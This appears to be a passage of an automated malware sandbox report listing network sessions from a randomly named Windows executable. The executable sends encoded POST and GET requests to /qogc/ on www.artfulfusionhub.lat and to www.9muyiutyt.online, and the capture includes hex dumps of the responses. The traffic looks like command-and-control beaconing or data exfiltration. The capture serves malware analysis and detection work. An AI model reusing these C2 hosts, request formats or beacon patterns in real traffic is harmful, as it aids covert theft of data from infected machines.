                                                          Jul 26, 2024 18:46:57.919553995 CEST984INData Raw: 28 6d 2d 39 37 3c 32 36 29 3c 3c 35 29 2b 28 28 21 77 5b 64 5d 26 26 6d 2d 36 35 3c 32 36 29 3c 3c 35 29 29 3a 74 5b 64 5d 29 29 3b 66 6f 72 28 69 3d 63 3d 79 2e 6c 65 6e 67 74 68 2c 30 3c 63 26 26 79 2e 70 75 73 68 28 22 2d 22 29 3b 69 3c 76 3b
                                                          Data Ascii: (m-97<26)<<5)+((!w[d]&&m-65<26)<<5)):t[d]));for(i=c=y.length,0<c&&y.push("-");i<v;){for(l=r,d=0;d<v;++d)h<=(C=t[d])&&C<l&&(l=C);if(l-h>Math.floor((r-f)/(i+1)))throw RangeError("punycode_overflow (1)");for(f+=(l-h)*(i+1),h=l,d=0;d<v;++d){if((C=


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          13192.168.2.555151188.114.96.3807156C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 26, 2024 18:47:03.023267031 CEST734OUTPOST /qogc/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate
                                                          Accept-Language: en-US,en;q=0.5
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Content-Length: 204
                                                          Host: www.artfulfusionhub.lat
                                                          Origin: http://www.artfulfusionhub.lat
                                                          Referer: http://www.artfulfusionhub.lat/qogc/
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 31 48 67 3d 74 51 32 2f 7a 54 4b 4a 4a 66 6a 66 49 57 4b 67 4c 38 65 63 70 55 4c 2f 58 56 4f 31 55 77 48 43 6b 4f 56 7a 7a 43 44 35 45 51 65 37 30 4f 6a 4f 54 53 31 51 6d 30 30 50 51 51 32 55 38 6c 63 55 41 4e 79 34 49 4a 4b 4f 4b 57 75 6b 50 74 67 34 78 34 4c 50 47 31 69 64 59 52 6a 6e 6b 65 46 32 44 44 32 63 77 66 36 71 76 45 58 32 69 7a 7a 33 74 66 55 2f 63 4c 71 37 61 59 6a 31 69 4b 6b 61 57 77 47 65 48 33 79 46 67 50 5a 45 32 58 4c 38 4a 52 4a 48 71 75 42 4b 35 6d 36 32 34 32 77 61 36 34 6d 51 79 47 2b 6d 49 67 73 67 35 72 35 75 39 2f 6a 53 2b 77 75 79 65 62 55 2b 4f 6e 43 57 57 77 74 31 6b 59 38 3d
                                                          Data Ascii: 1Hg=tQ2/zTKJJfjfIWKgL8ecpUL/XVO1UwHCkOVzzCD5EQe70OjOTS1Qm00PQQ2U8lcUANy4IJKOKWukPtg4x4LPG1idYRjnkeF2DD2cwf6qvEX2izz3tfU/cLq7aYj1iKkaWwGeH3yFgPZE2XL8JRJHquBK5m6242wa64mQyG+mIgsg5r5u9/jS+wuyebU+OnCWWwt1kY8=


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          14192.168.2.555152188.114.96.3807156C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 26, 2024 18:47:05.591670036 CEST754OUTPOST /qogc/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate
                                                          Accept-Language: en-US,en;q=0.5
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Content-Length: 224
                                                          Host: www.artfulfusionhub.lat
                                                          Origin: http://www.artfulfusionhub.lat
                                                          Referer: http://www.artfulfusionhub.lat/qogc/
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 31 48 67 3d 74 51 32 2f 7a 54 4b 4a 4a 66 6a 66 4a 32 61 67 4b 62 79 63 6f 30 4c 38 62 31 4f 31 64 51 48 47 6b 4f 52 7a 7a 41 76 70 48 69 4b 37 30 73 37 4f 42 41 64 51 68 30 30 50 66 77 32 4e 68 56 63 6c 41 4e 2b 77 49 49 6d 4f 4b 58 4f 6b 50 6f 45 34 32 4c 7a 4d 48 6c 69 66 51 78 6a 6c 75 2b 46 32 44 44 32 63 77 66 2f 50 76 41 37 32 69 44 44 33 2f 37 67 38 52 72 71 30 4b 6f 6a 31 31 36 6b 57 57 77 48 7a 48 31 47 6a 67 4e 52 45 32 56 54 38 4a 45 39 41 6a 75 42 4d 33 47 37 2f 2b 55 64 65 38 62 4f 73 39 57 33 67 62 69 78 5a 34 64 55 45 6e 64 72 36 74 51 43 4b 4f 49 63 4a 66 58 6a 2f 4d 54 39 46 36 50 70 73 71 2f 70 31 36 6a 70 34 52 6e 56 56 74 48 7a 2f 4d 44 6e 71
                                                          Data Ascii: 1Hg=tQ2/zTKJJfjfJ2agKbyco0L8b1O1dQHGkORzzAvpHiK70s7OBAdQh00Pfw2NhVclAN+wIImOKXOkPoE42LzMHlifQxjlu+F2DD2cwf/PvA72iDD3/7g8Rrq0Koj116kWWwHzH1GjgNRE2VT8JE9AjuBM3G7/+Ude8bOs9W3gbixZ4dUEndr6tQCKOIcJfXj/MT9F6Ppsq/p16jp4RnVVtHz/MDnq
                                                          Jul 26, 2024 18:47:06.912610054 CEST1236INHTTP/1.1 404 Not Found
                                                          Date: Fri, 26 Jul 2024 16:47:06 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                          Link: <https://artfulfusionhub.lat/wp-json/>; rel="https://api.w.org/"
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AI1M55TCg5bz0CP6bvjRaeKaBaNTeUnQUyDSAAZDD6wgnUR2XV6dfVpVcdasvqe3te3pU6SQSbHyar3WBq4FJrsn37%2Fym5ti4frKJgOdILvv3OoSDQvUddBRKkwDcR1WAnMdQFQMc6zjog%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8a95de9e6a0217ed-EWR
                                                          Content-Encoding: gzip
                                                          alt-svc: h3=":443"; ma=86400
                                                          Data Raw: 31 64 66 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d4 7d 6b 73 e3 36 b2 e8 67 fb 57 60 38 35 1e 71 87 a4 48 ea 61 59 b6 9c ca 71 b2 f7 e4 56 66 27 35 33 39 5b a7 c6 29 17 44 42 12 6c 92 60 00 d0 b2 af d7 ff fd 56 03 7c 4a d4 c3 8f c9 d9 e3 64 24 11 68 74 37 1a fd c0 9b 67 6f 7e fa 74 f1 f5 bf 7f fb 19 2d 64 1c 9d 1f 9e c1 17 8a 70 32 9f 18 24 b1 7f ff 62 40 1a c1 e1 f9 e1 c1 59 4c 24 46 c1 02 73 41 e4 c4 f8 fd eb df ed 91 51 a6 27 38 26 13 e3 96 92 65 ca b8 34 50 c0 12 49 12 39 31 96 34 94 8b 49 48 6e 69 40 6c f5 60 21 9a 50 49 71 64 8b 00 47 64 e2 29 2c 11 4d 6e 10 27 d1 c4 48 39 9b d1 88 18 68 c1 c9 6c 62 2c a4 4c c7 dd ee 3c 4e e7 0e e3 f3 ee dd 2c e9 7a 50 e6 f0 e0 4c 52 19 91 f3 df f0 9c a0 84 49 34 63 59 12 a2 a3 b7 23 df f3 4e 11 e6 72 96 45 b3 4c 50 96 2c b2 a9 13 61 79 d6 d5 25 0e 6b 4c bf e7 6c ca a4 78 5f b2 fc 3e c6 77 36 8d f1 9c d8 29 27 50 a5 71 84 f9 9c bc 47 dd f3 c3 8a cf f7 61 22 00 60 46 64 b0 78 af 99 7d df ed ce 58 22 85 33 67 6c 1e 11 9c 52 e1 04 2c ae 95 d4 60 50 27 31 2e 81 85 [TRUNCATED]
                                                          Data Ascii: 1dfc}ks6gW`85qHaYqVf'539[)DBl`V|Jd$ht7go~t-dp2$b@YL$FsAQ'8&e4PI914IHni@l`!PIqdGd),Mn'H9hlb,L<N,zPLRI4cY#NrELP,ay%kLlx_>w6)'PqGa"`Fdx}X"3glR,`P'1.2L&LIrGKb y4%].82h:wg]{qq$RN%NSs"^[So
                                                          Jul 26, 2024 18:47:06.912760019 CEST1236INData Raw: 17 3f fd f8 f5 c7 6f e8 6f dd c3 25 4d 42 b6 74 ae 96 29 89 d9 35 fd 42 a4 a4 c9 5c a0 09 7a 30 a6 58 90 df 79 64 8c 73 26 2e bb 97 5d e1 2c 41 09 2f bb 4a 3f c4 65 37 60 9c 5c 76 55 e1 cb ae 37 70 5c a7 77 d9 3d f6 ef 8e fd cb ae 61 19 e4 4e 1a
                                                          Data Ascii: ?oo%MBt)5B\z0Xyds&.],A/J?e7`\vU7p\w=aNcIav<|vUYb%X.Ie!*A9i\nA_T NDd$cIBYj%-Y"E::|^Rp_bL,Ic"$q'!Kt
                                                          Jul 26, 2024 18:47:06.912795067 CEST1236INData Raw: 93 37 9e 95 38 1c 7e 5e e0 28 9a e2 e0 a6 6e eb 75 40 f7 71 4d ac 55 5f a4 25 4b 29 6d 3b f3 ff fa 57 67 85 68 c7 b4 3a 04 6a a2 fa d4 ff fa d7 c3 a3 e9 d4 7a d5 3f 48 e8 9e 55 cf e6 98 38 f9 a0 e1 e8 88 38 72 99 ff ec 00 5c fe 04 9a 52 42 99 a6
                                                          Data Ascii: 78~^(nu@qMU_%K)m;Wgh:jz?HU88r\RBhrX!2pabB9tZa#Nv$l@!{e<eejFB4c74DLdbCl1Hm1s\=^%\G6<#uq@
                                                          Jul 26, 2024 18:47:06.914153099 CEST1236INData Raw: e6 13 9f b4 c3 45 59 4c 13 96 89 bc 00 e3 38 99 6b 1e 86 27 9b aa b5 52 06 c3 dc 29 14 09 a6 9b 8b 40 14 b0 e7 30 27 a9 a4 32 46 6f 8f a7 61 30 1d 6c e3 be 01 ee ba a1 3b ea 6f 11 4a 21 6c e0 7e 44 42 6f 16 6c c3 5d 87 76 87 27 3d d2 db 06 9d 66
                                                          Data Ascii: EYL8k'R)@0'2Foa0l;oJ!l~DBol]v'=f<d::@<Kv\Nv)k'QS.ox*982zTednw?|L7X#<}gn$zo|}FnI|wdy=w'u661Fs
                                                          Jul 26, 2024 18:47:06.914184093 CEST1236INData Raw: 5a c5 0a c4 8b a8 14 48 5a f0 ab 15 88 6a 56 ff a1 da e8 d2 82 71 75 e5 a2 8d 5f bd ae fe 74 84 ba 60 9b ee c0 8a c5 33 10 aa 72 2d f8 ee 9e 8d f1 ae 0d e7 e1 ff d4 c4 e9 e1 5f 33 2f 7c b8 61 c7 59 b9 93 d9 ac cb cf 53 33 f0 6a b3 52 79 84 c4 19
                                                          Data Ascii: ZHZjVqu_t`3r-_3/|aYS3jRyy@1u7HG4k ii"5d],::#C&,.p\9;)[Z6QTM|5Um=[*F=X)S{%Y{;MI`G:
                                                          Jul 26, 2024 18:47:06.914788008 CEST1236INData Raw: 9f 28 57 09 ca 12 3b 3f 58 8a 04 4d e6 91 1a fa cd a1 91 66 04 76 54 93 d0 16 11 05 85 d3 2b 98 22 50 d8 6b 63 23 b8 56 f6 f0 e0 2c a4 b7 4a 34 29 68 6c c1 39 48 5f 35 ce 19 2e 93 6e 68 6a 2b 9f 91 cf d0 71 ad ea 20 e0 c2 25 bc cd d5 d3 38 ff 72
                                                          Data Ascii: (W;?XMfvT+"Pkc#V,J4)hl9H_5.nhj+q %8rCS$Yag]Fc,$<6VCgh1ITk0S84$,6vgxW8n^|~M67J&If2i@](HUQl<+Pds
                                                          Jul 26, 2024 18:47:06.914822102 CEST1053INData Raw: a8 f4 da 8c 4c d3 41 6a a7 81 d5 44 ab 2a ab fb c8 0b 1a 86 24 99 18 92 67 44 ad d4 54 f3 39 b5 b8 53 91 5c 8b 63 2b 8b 03 b9 8f 38 ac ac 53 cd 5a e7 b3 aa 0d 53 2d a7 5a d7 aa 58 9f c2 5b 0d 5b 25 8e 52 91 39 c9 ed 4d f9 1e 3d 31 4b 93 26 ad 6a
                                                          Data Ascii: LAjD*$gDT9S\c+8SZS-ZX[[%R9M=1K&jZ1y8*H\JekHU[i"Ci]T=_ozV1EXYFBl,JW#kU%g*#.h|pmZ<?h[/O$3^^]"hQ


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          15192.168.2.555153188.114.96.3807156C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 26, 2024 18:47:08.180576086 CEST1771OUTPOST /qogc/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate
                                                          Accept-Language: en-US,en;q=0.5
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Content-Length: 1240
                                                          Host: www.artfulfusionhub.lat
                                                          Origin: http://www.artfulfusionhub.lat
                                                          Referer: http://www.artfulfusionhub.lat/qogc/
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 31 48 67 3d 74 51 32 2f 7a 54 4b 4a 4a 66 6a 66 4a 32 61 67 4b 62 79 63 6f 30 4c 38 62 31 4f 31 64 51 48 47 6b 4f 52 7a 7a 41 76 70 48 69 79 37 30 5a 6e 4f 54 33 42 51 67 30 30 50 53 51 32 49 68 56 63 34 41 4e 6d 30 49 4a 61 77 4b 53 4b 6b 4f 4f 59 34 7a 36 7a 4d 4a 6c 69 66 53 78 6a 6f 6b 65 46 76 44 43 61 59 77 66 76 50 76 41 37 32 69 42 62 33 70 66 55 38 58 72 71 37 61 59 6a 44 69 4b 6b 79 57 77 2b 47 48 31 43 56 67 35 6c 45 33 31 44 38 50 32 6c 41 37 2b 42 4f 32 32 37 6e 2b 55 52 52 38 61 6a 41 39 56 72 47 62 67 78 5a 31 4c 5a 50 2f 63 58 36 38 51 4f 34 4a 6f 55 71 4c 48 6e 6a 43 41 35 55 79 4f 39 53 71 4f 41 63 39 6d 52 6d 54 6e 55 4a 35 44 62 33 42 32 71 67 59 37 4d 4d 67 6a 36 76 38 67 47 63 6e 57 79 49 66 6f 35 4c 37 4d 4d 54 4e 34 6b 63 69 75 37 7a 6c 61 43 66 47 36 34 6d 6b 73 47 62 57 77 45 68 52 4a 74 4b 51 7a 42 45 61 42 67 45 66 59 33 2f 64 57 50 4c 6a 55 2f 62 45 37 62 50 65 65 63 7a 2f 69 66 31 37 67 47 4e 39 4c 68 55 62 78 39 61 33 39 71 37 69 42 76 37 59 5a 61 37 61 46 62 69 32 4a [TRUNCATED]
                                                          Data Ascii: 1Hg=tQ2/zTKJJfjfJ2agKbyco0L8b1O1dQHGkORzzAvpHiy70ZnOT3BQg00PSQ2IhVc4ANm0IJawKSKkOOY4z6zMJlifSxjokeFvDCaYwfvPvA72iBb3pfU8Xrq7aYjDiKkyWw+GH1CVg5lE31D8P2lA7+BO227n+URR8ajA9VrGbgxZ1LZP/cX68QO4JoUqLHnjCA5UyO9SqOAc9mRmTnUJ5Db3B2qgY7MMgj6v8gGcnWyIfo5L7MMTN4kciu7zlaCfG64mksGbWwEhRJtKQzBEaBgEfY3/dWPLjU/bE7bPeecz/if17gGN9LhUbx9a39q7iBv7YZa7aFbi2JXTCKomBM2NnPGpXkTl3NRYPl7iTzYIr/HG9Kau5ruTZhjdKbanFRNzFuqsfyN4ePA+grKSvEYiugQfXf1IUAzaJp0bhacFaUf3oVX0jJTOJcmi9fHla6vxhoHreDbaLT9QzoMhzaahGPPRLoG795Ah0xO4DYGB5lX8DIe11Qj0BQmaz5jhNL/dgrwPXbkCqLPuHEHTgUQ9+IQK2RI9KPZHHpcRP/TsQDqjpPrIKEv0fxGfAIAuvklXpB7htN5Is/Bfhnd8mIHgFb3lNXJMjK1axGdecU8OP4NyronPP443vZRw3MtVFti8Jww0pmoCxmG6/puiBWVDxkLp818S8sdJk/Ta9HcV+i0OeSxk0+IrWQSyiQxpnWBskqcvcpwFNUISzcbwDRZwqkrwWQrZP9ZPCp13me3q58+OCZj/EW73tbIzUOHT4i0GYTNNt57IrIbmrKrrWC4N+h7w4Q2V5IYBhXj4Az4/ylGlARy6CV4g1MiFVMJg8A8O07AJTYVh6LuIMFss430roeIAuo8TVuvxYkhteDPPrweQtSexsHdcPEKiXFH9OK8QHxgJzgH97ologLerkFF+9P9oTQzpstpPBAb/bJLzjkwZX9AoIuBhsAy2DmmTHq5GbpzDOqgB0idnvi/nniVhquc6CVNa0VCWL4uqw7oKgI8Z [TRUNCATED]
                                                          Jul 26, 2024 18:47:09.166889906 CEST1236INHTTP/1.1 404 Not Found
                                                          Date: Fri, 26 Jul 2024 16:47:09 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                          Link: <https://artfulfusionhub.lat/wp-json/>; rel="https://api.w.org/"
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vyx4OccAPKycjOy9lPhVF6kuv9neiD6ccNrXu9Yr46Izv%2Fef%2FzVCbdPC8AeCAq1vWwmdcjrLm0wsJHrW5c6ly2XGOOhd4sls5cOBHPlA%2FY5GJf2zrNMjSeRqC7LvXAbkXK7J4nxlRRFOLw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8a95deae9caf4370-EWR
                                                          Content-Encoding: gzip
                                                          alt-svc: h3=":443"; ma=86400
                                                          Data Raw: 31 64 66 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d4 7d 6b 73 e3 36 b2 e8 67 fb 57 60 38 35 1e 71 87 a4 48 ea 61 59 b6 9c ca 71 b2 f7 e4 56 66 27 35 33 39 5b a7 c6 29 17 44 42 12 6c 92 60 00 d0 b2 af d7 ff fd 56 03 7c 4a d4 c3 8f c9 d9 e3 64 24 11 68 74 37 1a fd c0 9b 67 6f 7e fa 74 f1 f5 bf 7f fb 19 2d 64 1c 9d 1f 9e c1 17 8a 70 32 9f 18 24 b1 7f ff 62 40 1a c1 e1 f9 e1 c1 59 4c 24 46 c1 02 73 41 e4 c4 f8 fd eb df ed 91 51 a6 27 38 26 13 e3 96 92 65 ca b8 34 50 c0 12 49 12 39 31 96 34 94 8b 49 48 6e 69 40 6c f5 60 21 9a 50 49 71 64 8b 00 47 64 e2 29 2c 11 4d 6e 10 27 d1 c4 48 39 9b d1 88 18 68 c1 c9 6c 62 2c a4 4c c7 dd ee 3c 4e e7 0e e3 f3 ee dd 2c e9 7a 50 e6 f0 e0 4c 52 19 91 f3 df f0 9c a0 84 49 34 63 59 12 a2 a3 b7 23 df f3 4e 11 e6 72 96 45 b3 4c 50 96 2c b2 a9 13 61 79 d6 d5 25 0e 6b 4c bf e7 6c ca a4 78 5f b2 fc 3e c6 77 36 8d f1 9c d8 29 27 50 a5 71 84 f9 9c bc 47 dd f3 c3 8a cf f7 61 22 00 60 46 64 b0 78 af 99 7d df ed ce 58 22 85 33 67 6c 1e 11 9c 52 e1 04 2c ae 95 d4 60 50 27 31 2e 81 85 [TRUNCATED]
                                                          Data Ascii: 1dfe}ks6gW`85qHaYqVf'539[)DBl`V|Jd$ht7go~t-dp2$b@YL$FsAQ'8&e4PI914IHni@l`!PIqdGd),Mn'H9hlb,L<N,zPLRI4cY#NrELP,ay%kLlx_>w6)'PqGa"`Fdx}X"3glR,`P'1.2L&LIrGKb y4%].82h:wg]{qq$RN%NSs"^[S
                                                          Jul 26, 2024 18:47:09.167099953 CEST1236INData Raw: d0 d9 9b 6f 17 3f fd f8 f5 c7 6f e8 6f dd c3 25 4d 42 b6 74 ae 96 29 89 d9 35 fd 42 a4 a4 c9 5c a0 09 7a 30 a6 58 90 df 79 64 8c 73 26 2e bb 97 5d e1 2c 41 09 2f bb 4a 3f c4 65 37 60 9c 5c 76 55 e1 cb ae 37 70 5c a7 77 d9 3d f6 ef 8e fd cb ae 61
                                                          Data Ascii: o?oo%MBt)5B\z0Xyds&.],A/J?e7`\vU7p\w=aNcIav<|vUYb%X.Ie!*A9i\nA_T NDd$cIBYj%-Y"E::|^Rp_bL,Ic"$q'!K
                                                          Jul 26, 2024 18:47:09.167110920 CEST1236INData Raw: 47 f0 c6 f7 93 37 9e 95 38 1c 7e 5e e0 28 9a e2 e0 a6 6e eb 75 40 f7 71 4d ac 55 5f a4 25 4b 29 6d 3b f3 ff fa 57 67 85 68 c7 b4 3a 04 6a a2 fa d4 ff fa d7 c3 a3 e9 d4 7a d5 3f 48 e8 9e 55 cf e6 98 38 f9 a0 e1 e8 88 38 72 99 ff ec 00 5c fe 04 9a
                                                          Data Ascii: G78~^(nu@qMU_%K)m;Wgh:jz?HU88r\RBhrX!2pabB9tZa#Nv$l@!{e<eejFB4c74DLdbCl1Hm1s\=^%\G6<#
                                                          Jul 26, 2024 18:47:09.168064117 CEST1236INData Raw: 8e d1 db 60 e6 13 9f b4 c3 45 59 4c 13 96 89 bc 00 e3 38 99 6b 1e 86 27 9b aa b5 52 06 c3 dc 29 14 09 a6 9b 8b 40 14 b0 e7 30 27 a9 a4 32 46 6f 8f a7 61 30 1d 6c e3 be 01 ee ba a1 3b ea 6f 11 4a 21 6c e0 7e 44 42 6f 16 6c c3 5d 87 76 87 27 3d d2
                                                          Data Ascii: `EYL8k'R)@0'2Foa0l;oJ!l~DBol]v'=f<d::@<Kv\Nv)k'QS.ox*982zTednw?|L7X#<}gn$zo|}FnI|wdy=w'u661F
                                                          Jul 26, 2024 18:47:09.168075085 CEST1236INData Raw: 9d 26 aa 16 5a c5 0a c4 8b a8 14 48 5a f0 ab 15 88 6a 56 ff a1 da e8 d2 82 71 75 e5 a2 8d 5f bd ae fe 74 84 ba 60 9b ee c0 8a c5 33 10 aa 72 2d f8 ee 9e 8d f1 ae 0d e7 e1 ff d4 c4 e9 e1 5f 33 2f 7c b8 61 c7 59 b9 93 d9 ac cb cf 53 33 f0 6a b3 52
                                                          Data Ascii: &ZHZjVqu_t`3r-_3/|aYS3jRyy@1u7HG4k ii"5d],::#C&,.p\9;)[Z6QTM|5Um=[*F=X)S{%Y{;MI`G
                                                          Jul 26, 2024 18:47:09.169152021 CEST1236INData Raw: 05 5a c0 d5 9f 28 57 09 ca 12 3b 3f 58 8a 04 4d e6 91 1a fa cd a1 91 66 04 76 54 93 d0 16 11 05 85 d3 2b 98 22 50 d8 6b 63 23 b8 56 f6 f0 e0 2c a4 b7 4a 34 29 68 6c c1 39 48 5f 35 ce 19 2e 93 6e 68 6a 2b 9f 91 cf d0 71 ad ea 20 e0 c2 25 bc cd d5
                                                          Data Ascii: Z(W;?XMfvT+"Pkc#V,J4)hl9H_5.nhj+q %8rCS$Yag]Fc,$<6VCgh1ITk0S84$,6vgxW8n^|~M67J&If2i@](HUQl<+P
                                                          Jul 26, 2024 18:47:09.169162035 CEST776INData Raw: a1 52 f5 f3 2f 2a bd 36 23 d3 74 90 da 69 60 35 d1 aa ca ea 3e f2 82 86 21 49 26 86 e4 19 51 2b 35 d5 7c 4e 2d ee 54 24 d7 e2 d8 ca e2 40 ee 23 0e 2b eb 54 b3 d6 f9 ac 6a c3 54 cb a9 d6 b5 2a d6 a7 f0 56 c3 56 89 a3 54 64 4e 72 7b 53 be 47 4f cc
                                                          Data Ascii: R/*6#ti`5>!I&Q+5|N-T$@#+TjT*VVTdNr{SGOIVmzdE46ndxtRRV.z*jMhajF+HUGje,,#!M6v{*VgZ3}osnKlT4@>z6c_bn4'h/Xz.EGKO}
                                                          Jul 26, 2024 18:47:09.169171095 CEST283INData Raw: f7 0d b6 99 e5 77 da 16 d8 ba f3 f9 5a 74 ab f9 b5 c6 3e 40 d7 3b f6 7c 7f 98 ef 70 d1 bb d0 6b db 44 fe 72 36 cb 9d 22 f6 8c 05 99 b0 67 f4 6e 27 bf 2d 65 fe 7a c6 8b 6d db d0 33 f9 4f 75 12 6f 33 df c5 86 69 80 cd 8f ed 7d df dd dc fa ad b9 91
                                                          Data Ascii: wZt>@;|pkDr6"gn'-ezm3Ouo3i}z`-xoy|_fb,XwZpwPZ`*iW<5U?WCb1coBg2h85Y<pTr~q~vFY]KEY{MOhbG


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          16192.168.2.555154188.114.96.3807156C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 26, 2024 18:47:10.756584883 CEST473OUTGET /qogc/?1Hg=gSefwjuKZsCuEGncBKSqgUjxJH+JcQqz+YMIzSjuOw+Y7MS0RxllxFRTV2Gn+zIiEtGaIum1DRHYZfVjpe+PZ37sYiWUr85MYTmGz//Zl0zNgUvOn9EXUqnEL5f2vZZjHw==&ejlto=QtkhctgpxJahPP0 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.5
                                                          Connection: close
                                                          Host: www.artfulfusionhub.lat
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Jul 26, 2024 18:47:12.013639927 CEST937INHTTP/1.1 301 Moved Permanently
                                                          Date: Fri, 26 Jul 2024 16:47:11 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                          X-Redirect-By: WordPress
                                                          Location: https://artfulfusionhub.lat/qogc/?1Hg=gSefwjuKZsCuEGncBKSqgUjxJH+JcQqz+YMIzSjuOw+Y7MS0RxllxFRTV2Gn+zIiEtGaIum1DRHYZfVjpe+PZ37sYiWUr85MYTmGz//Zl0zNgUvOn9EXUqnEL5f2vZZjHw==&ejlto=QtkhctgpxJahPP0
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S3aOsu1%2BDw9TiYEw7Ao4cLqq2YmoGegVy1dqpSCbKBfsVd7S4ZfDCY%2FIjIWWPnpxqhdsMdQvB%2BYXL17yXfy2tK%2Bvio48gfmZebp56mpe6S%2BgwsyUNs9Kgw4YbWm7VFKI4rDnYY6dvI%2BKKQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8a95debeaea48c18-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          17192.168.2.555155154.218.3.243807156C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 26, 2024 18:47:17.141370058 CEST725OUTPOST /39t8/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate
                                                          Accept-Language: en-US,en;q=0.5
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Content-Length: 204
                                                          Host: www.9muyiutyt.online
                                                          Origin: http://www.9muyiutyt.online
                                                          Referer: http://www.9muyiutyt.online/39t8/
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
